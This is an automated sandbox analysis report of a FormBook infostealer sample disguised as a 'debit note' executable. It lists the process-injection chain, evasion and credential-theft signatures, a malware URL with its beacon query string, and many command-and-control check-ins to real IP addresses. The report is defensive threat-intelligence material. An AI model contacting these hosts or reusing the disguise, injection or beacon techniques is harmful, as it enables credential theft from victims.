Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

Overview

General Information

Sample name:debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe
renamed because original name is a hash value
Original sample name:debitnote607-36099895.exe
Analysis ID:1548308
MD5:a60ae01b598fd87cbc1ed78936ded2e6
SHA1:3a9bb16caa197dde7190a1bd9b2ac86713ab09a2
SHA256:a9b71509abbfcf9ed2120614204bd47ab10bd54cd7b0b2a4b89eed3b559a0fae
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe (PID: 1448 cmdline: "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe" MD5: A60AE01B598FD87CBC1ED78936DED2E6)
    • svchost.exe (PID: 5308 cmdline: "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • PMZSowQBcVJqD.exe (PID: 2080 cmdline: "C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xcopy.exe (PID: 2108 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
          • PMZSowQBcVJqD.exe (PID: 5332 cmdline: "C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5216 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4097004785.0000000003200000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.4099556675.0000000005630000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.2058640139.0000000002FB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe" , ParentImage: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe, ParentProcessId: 2080, ParentProcessName: PMZSowQBcVJqD.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 2108, ProcessName: xcopy.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe", CommandLine: "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe", ParentImage: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe, ParentProcessId: 1448, ParentProcessName: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe, ProcessCommandLine: "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe", ProcessId: 5308, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe", CommandLine: "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe", ParentImage: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe, ParentProcessId: 1448, ParentProcessName: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe, ProcessCommandLine: "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe", ProcessId: 5308, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-04T10:10:15.841217+010020229301A Network Trojan was detected4.175.87.197443192.168.2.449730TCP
                2024-11-04T10:10:55.709492+010020229301A Network Trojan was detected4.175.87.197443192.168.2.449737TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-04T10:10:51.878537+010020507451Malware Command and Control Activity Detected192.168.2.449736195.154.200.1580TCP
                2024-11-04T10:11:15.422529+010020507451Malware Command and Control Activity Detected192.168.2.449836199.59.243.22780TCP
                2024-11-04T10:11:28.863331+010020507451Malware Command and Control Activity Detected192.168.2.449912162.0.215.24480TCP
                2024-11-04T10:11:42.714914+010020507451Malware Command and Control Activity Detected192.168.2.449978104.21.3.14480TCP
                2024-11-04T10:11:56.260992+010020507451Malware Command and Control Activity Detected192.168.2.45001876.223.67.18980TCP
                2024-11-04T10:12:10.521608+010020507451Malware Command and Control Activity Detected192.168.2.4500223.33.130.19080TCP
                2024-11-04T10:12:24.065523+010020507451Malware Command and Control Activity Detected192.168.2.45002684.32.84.3280TCP
                2024-11-04T10:12:37.587933+010020507451Malware Command and Control Activity Detected192.168.2.450030162.0.231.20380TCP
                2024-11-04T10:12:51.585839+010020507451Malware Command and Control Activity Detected192.168.2.450034150.95.254.1680TCP
                2024-11-04T10:13:12.177218+010020507451Malware Command and Control Activity Detected192.168.2.4500383.33.130.19080TCP
                2024-11-04T10:13:26.300452+010020507451Malware Command and Control Activity Detected192.168.2.450042199.59.243.22780TCP
                2024-11-04T10:13:39.985829+010020507451Malware Command and Control Activity Detected192.168.2.450046217.160.0.11180TCP
                2024-11-04T10:13:54.517791+010020507451Malware Command and Control Activity Detected192.168.2.450050168.76.221.25280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-04T10:10:51.878537+010028554651A Network Trojan was detected192.168.2.449736195.154.200.1580TCP
                2024-11-04T10:11:15.422529+010028554651A Network Trojan was detected192.168.2.449836199.59.243.22780TCP
                2024-11-04T10:11:28.863331+010028554651A Network Trojan was detected192.168.2.449912162.0.215.24480TCP
                2024-11-04T10:11:42.714914+010028554651A Network Trojan was detected192.168.2.449978104.21.3.14480TCP
                2024-11-04T10:11:56.260992+010028554651A Network Trojan was detected192.168.2.45001876.223.67.18980TCP
                2024-11-04T10:12:10.521608+010028554651A Network Trojan was detected192.168.2.4500223.33.130.19080TCP
                2024-11-04T10:12:24.065523+010028554651A Network Trojan was detected192.168.2.45002684.32.84.3280TCP
                2024-11-04T10:12:37.587933+010028554651A Network Trojan was detected192.168.2.450030162.0.231.20380TCP
                2024-11-04T10:12:51.585839+010028554651A Network Trojan was detected192.168.2.450034150.95.254.1680TCP
                2024-11-04T10:13:12.177218+010028554651A Network Trojan was detected192.168.2.4500383.33.130.19080TCP
                2024-11-04T10:13:26.300452+010028554651A Network Trojan was detected192.168.2.450042199.59.243.22780TCP
                2024-11-04T10:13:39.985829+010028554651A Network Trojan was detected192.168.2.450046217.160.0.11180TCP
                2024-11-04T10:13:54.517791+010028554651A Network Trojan was detected192.168.2.450050168.76.221.25280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-04T10:11:07.738394+010028554641A Network Trojan was detected192.168.2.449789199.59.243.22780TCP
                2024-11-04T10:11:10.289723+010028554641A Network Trojan was detected192.168.2.449805199.59.243.22780TCP
                2024-11-04T10:11:12.913203+010028554641A Network Trojan was detected192.168.2.449820199.59.243.22780TCP
                2024-11-04T10:11:21.224442+010028554641A Network Trojan was detected192.168.2.449870162.0.215.24480TCP
                2024-11-04T10:11:23.749539+010028554641A Network Trojan was detected192.168.2.449884162.0.215.24480TCP
                2024-11-04T10:11:26.346988+010028554641A Network Trojan was detected192.168.2.449900162.0.215.24480TCP
                2024-11-04T10:11:35.035209+010028554641A Network Trojan was detected192.168.2.449940104.21.3.14480TCP
                2024-11-04T10:11:37.604280+010028554641A Network Trojan was detected192.168.2.449953104.21.3.14480TCP
                2024-11-04T10:11:40.092181+010028554641A Network Trojan was detected192.168.2.449965104.21.3.14480TCP
                2024-11-04T10:11:49.292599+010028554641A Network Trojan was detected192.168.2.45000876.223.67.18980TCP
                2024-11-04T10:11:50.971334+010028554641A Network Trojan was detected192.168.2.45001676.223.67.18980TCP
                2024-11-04T10:11:54.574030+010028554641A Network Trojan was detected192.168.2.45001776.223.67.18980TCP
                2024-11-04T10:12:02.827581+010028554641A Network Trojan was detected192.168.2.4500193.33.130.19080TCP
                2024-11-04T10:12:05.370921+010028554641A Network Trojan was detected192.168.2.4500203.33.130.19080TCP
                2024-11-04T10:12:07.920945+010028554641A Network Trojan was detected192.168.2.4500213.33.130.19080TCP
                2024-11-04T10:12:16.425876+010028554641A Network Trojan was detected192.168.2.45002384.32.84.3280TCP
                2024-11-04T10:12:18.969660+010028554641A Network Trojan was detected192.168.2.45002484.32.84.3280TCP
                2024-11-04T10:12:21.498423+010028554641A Network Trojan was detected192.168.2.45002584.32.84.3280TCP
                2024-11-04T10:12:29.975186+010028554641A Network Trojan was detected192.168.2.450027162.0.231.20380TCP
                2024-11-04T10:12:33.277137+010028554641A Network Trojan was detected192.168.2.450028162.0.231.20380TCP
                2024-11-04T10:12:35.032477+010028554641A Network Trojan was detected192.168.2.450029162.0.231.20380TCP
                2024-11-04T10:12:43.965166+010028554641A Network Trojan was detected192.168.2.450031150.95.254.1680TCP
                2024-11-04T10:12:46.548134+010028554641A Network Trojan was detected192.168.2.450032150.95.254.1680TCP
                2024-11-04T10:12:49.047483+010028554641A Network Trojan was detected192.168.2.450033150.95.254.1680TCP
                2024-11-04T10:12:58.308368+010028554641A Network Trojan was detected192.168.2.4500353.33.130.19080TCP
                2024-11-04T10:12:59.961740+010028554641A Network Trojan was detected192.168.2.4500363.33.130.19080TCP
                2024-11-04T10:13:03.418080+010028554641A Network Trojan was detected192.168.2.4500373.33.130.19080TCP
                2024-11-04T10:13:17.958577+010028554641A Network Trojan was detected192.168.2.450039199.59.243.22780TCP
                2024-11-04T10:13:20.518298+010028554641A Network Trojan was detected192.168.2.450040199.59.243.22780TCP
                2024-11-04T10:13:23.439968+010028554641A Network Trojan was detected192.168.2.450041199.59.243.22780TCP
                2024-11-04T10:13:32.386564+010028554641A Network Trojan was detected192.168.2.450043217.160.0.11180TCP
                2024-11-04T10:13:34.981741+010028554641A Network Trojan was detected192.168.2.450044217.160.0.11180TCP
                2024-11-04T10:13:37.485727+010028554641A Network Trojan was detected192.168.2.450045217.160.0.11180TCP
                2024-11-04T10:13:46.766436+010028554641A Network Trojan was detected192.168.2.450047168.76.221.25280TCP
                2024-11-04T10:13:49.305846+010028554641A Network Trojan was detected192.168.2.450048168.76.221.25280TCP
                2024-11-04T10:13:51.683850+010028554641A Network Trojan was detected192.168.2.450049168.76.221.25280TCP
                2024-11-04T10:14:00.641081+010028554641A Network Trojan was detected192.168.2.450051185.179.189.19380TCP
                2024-11-04T10:14:03.717669+010028554641A Network Trojan was detected192.168.2.450052185.179.189.19380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-04T10:11:07.738394+010028563181A Network Trojan was detected192.168.2.449789199.59.243.22780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeAvira: detected
                Source: http://www.98yl9900.vip/vpuy/Avira URL Cloud: Label: malware
                Source: http://www.98yl9900.vip/vpuy/?Q8r=GohnPojKoDSo26eExaRPtq0fYHz1awKnkuX4rqCOwHJs0Om2tBI/qHVUK+LhjFCYnUGrzAuj4BG5Iu5ezVBqMm60AjojQL4Je3zYgtUuMeqMe2LW7C+ksjQ=&6trpq=anQT3nAvira URL Cloud: Label: malware
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeReversingLabs: Detection: 60%
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4097004785.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4099556675.0000000005630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2058640139.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4097236613.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4096792766.0000000003740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2059058691.0000000004D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeJoe Sandbox ML: detected
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: xcopy.pdbUGP source: svchost.exe, 00000001.00000003.2026657859.0000000003013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2026718174.000000000302B000.00000004.00000020.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000002.4095627699.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PMZSowQBcVJqD.exe, 00000005.00000000.1982139512.0000000000CDE000.00000002.00000001.01000000.00000005.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2133989943.0000000000CDE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2058786262.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1966811502.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1968342442.0000000003400000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2069920922.000000000320E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.0000000003560000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2071661986.00000000033B7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2058786262.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1966811502.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1968342442.0000000003400000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000006.00000003.2069920922.000000000320E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.0000000003560000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2071661986.00000000033B7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: xcopy.pdb source: svchost.exe, 00000001.00000003.2026657859.0000000003013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2026718174.000000000302B000.00000004.00000020.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000002.4095627699.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: xcopy.exe, 00000006.00000002.4095507452.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2360502532.000000001584C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: xcopy.exe, 00000006.00000002.4095507452.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2360502532.000000001584C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A3C330 FindFirstFileW,FindNextFileW,FindClose,6_2_00A3C330
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 4x nop then xor eax, eax6_2_00A29DC0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 4x nop then mov ebx, 00000004h6_2_033504E8
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeCode function: 4x nop then pop edi7_2_056595F4
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeCode function: 4x nop then xor eax, eax7_2_0564E25F
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeCode function: 4x nop then pop edi7_2_05648A2A
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h8_2_000002B4556084E8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 195.154.200.15:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 195.154.200.15:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49805 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49789 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49789 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49836 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49836 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49870 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49900 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49912 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49912 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49940 -> 104.21.3.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 104.21.3.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49978 -> 104.21.3.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49978 -> 104.21.3.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49820 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49965 -> 104.21.3.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50018 -> 76.223.67.189:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 76.223.67.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 76.223.67.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50008 -> 76.223.67.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 76.223.67.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50030 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 150.95.254.16:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50034 -> 150.95.254.16:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 150.95.254.16:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 168.76.221.252:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50038 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 150.95.254.16:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 217.160.0.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 150.95.254.16:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50042 -> 199.59.243.227:80
